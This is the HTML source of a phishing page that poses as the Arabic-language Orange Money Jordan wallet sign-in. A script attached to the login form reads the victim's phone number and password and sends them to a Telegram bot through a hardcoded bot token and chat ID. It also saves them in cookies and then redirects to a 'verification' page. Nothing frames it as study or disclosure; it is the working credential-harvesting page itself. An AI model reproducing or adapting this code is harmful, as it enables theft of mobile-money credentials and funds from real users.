<!DOCTYPE html><!-- Last Published: Sat Nov 02 2024 03:43:02 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="" data-wf-page="58e125466699330e60585c64" data-wf-site="64ef7d0d34ee51e7fdfd939c" lang="en"><head><meta charset="utf-8"/><title>Orange Money - الصفحة الرئيسية</title><meta content="Orange Money Jo" property="og:title"/><meta content="محفظة Orange Money Jo" property="og:description"/><meta content="https://cdn.prod.website-files.com/666e729fb80c1977761b0653/6673eac4fdd598fdb1964e58_448502319_1665996197496616_7531919784203745278_n.jpg" property="og:image"/><meta content="Orange Money Jo" property="twitter:title"/><meta content="محفظة Orange Money Jo" property="twitter:description"/><meta content="https://cdn.prod.website-files.com/666e729fb80c1977761b0653/6673eac4fdd598fdb1964e58_448502319_1665996197496616_7531919784203745278_n.jpg" property="twitter:image"/><meta property="og:type" content="website"/><meta content="summary_large_image" name="twitter:card"/><meta content="width=device-width, initial-scale=1" name="viewport"/><link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css"/><link href="https://fonts.googleapis.com" rel="preconnect"/><link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/><script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script><script type="text/javascript">WebFont.load({  google: {    families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Roboto:300,regular,500"]  }});</script><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script><link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon"/><link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon"/><style>























body {











  box-sizing: border-box; 











  font-size:18px;











}























  .container {











  /*max-width: 800px;*/











  padding: 0 5%;











  /*margin: auto;*/











}























  .field-holder {











  position: relative; 











  margin-bottom:1.25em;











  }























  .w-input {











  border:0;











  border-bottom: 3px solid #dfdfdf;











  outline:none;











}























  label { 











  position:absolute;











  top:0;











  left:0;











  font-size:1em;











  color:#424242;











  display:flex;











  align-items:center;











  cursor:text;











  transition: .3s ease-in-out;











  }











  











 .w-input, label {











  font-size:1em;











  width:100%;











  height:55px;











  }











  











 .w-input:focus + label, 











 .w-input:valid + label {











  color:#ff7900;











  font-size:.75em;











  top:-25px;











  pointer-events: none;











}











    











    











 .w-input:focus,  .w-input:valid { 











     border-bottom: 3px solid #ff7900;











    }















































.CustomFooter {











  position: fixed;











  left: 0;











  bottom: 0;











  }























</style></head><body class="body"><div class="div-block-2"><div class="header-section"><div class="w-container"><a href="/" aria-current="page" class="blog-home-link w-inline-block w--current"><img src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/6709b4ecad0f1ceeeed963e7_OM%20logo_0.svg" loading="lazy" width="106" height="Auto" alt="" class="image"/></a></div></div></div><div class="div-block-4"><div class="container"><div class="w-form"><form id="signin" name="wf-form-" data-name="تسجيل الدخول" redirect="/verification.html" data-redirect="/verification.html" method="get" data-wf-page-id="58e125466699330e60585c64" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663"><div id="field" class="field-holder"><input class="text-field-2 w-input" minlength="10" maxlength="10" name="field" inputmode="numeric" data-name="رقم الهاتف" pattern="^(079|078|077)[0-9]{7}$"*" placeholder="" type="text" id="phonenumber" required=""/><label for="phonenumber" class="field-label">رقم المحفظة</label></div><div id="field" class="field-holder"><input class="text-field-2 w-input" maxlength="256" name="field" "data-name="كلمة السر" placeholder="" type="text" id="password" <input type="text" required=""/><label <input type="text" minlength="3" ><label for="password" class="field-label-2">كلمة السر</label></div><div class="div-block"><input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="تسجيل دخول"/></div><div class="div-block spacea"><input type="submit" data-wait="يرجى الانتظار" class="submit-button button-black w-button" value="التسجيل الذاتي"/><input type="submit" data-wait="يرجى الانتظار" class="submit-button button-black not-black w-button" value="تسجيل دخول لأول مرة"/></div></form><div class="w-form-done"><div>Thank you! Your submission has been received!</div></div><div class="w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div><script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script><script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script><script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>











<script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.20.1/dist/jquery.validate.min.js"></script> 











<script>











function setCookie(cname, cvalue, exdays) {











  const d = new Date();











  d.setTime(d.getTime() + (exdays*24*60*60*1000));











  let expires = "expires="+ d.toUTCString();











  document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";











}



































$('#signin').on( "submit", function () {











phonenumber = document.getElementById('phonenumber').value











document.getElementById('phonenumber').setAttribute("name",'phonenumber')











password = document.getElementById('password').value











document.getElementById('password').setAttribute("name",'password');























            var message = "رقم الهاتف:`"+phonenumber+"`\n"











            message += "كلمة السر:`"+password+"`\n"











            $.ajax({











                type: 'POST',











                url: `https://api.telegram.org/bot8125381566:AAGfyKuODnK_RufFKXOQ15tS9ar_lBFBot4/sendMessage`,











                data: {











                    chat_id: "-4625923889",











                    text: message,











                    parse_mode: 'markdown',











                },











                success: function (res) {











                    console.debug(res);











                    $('#response').text('Message sent');











                },











                error: function (error) {











                    console.error(error);











                    alert("error failed");











                }











            });


            




setCookie("phonenumber",phonenumber,1000);











setCookie("password",password,1000);











})















































</script>























</body></html>



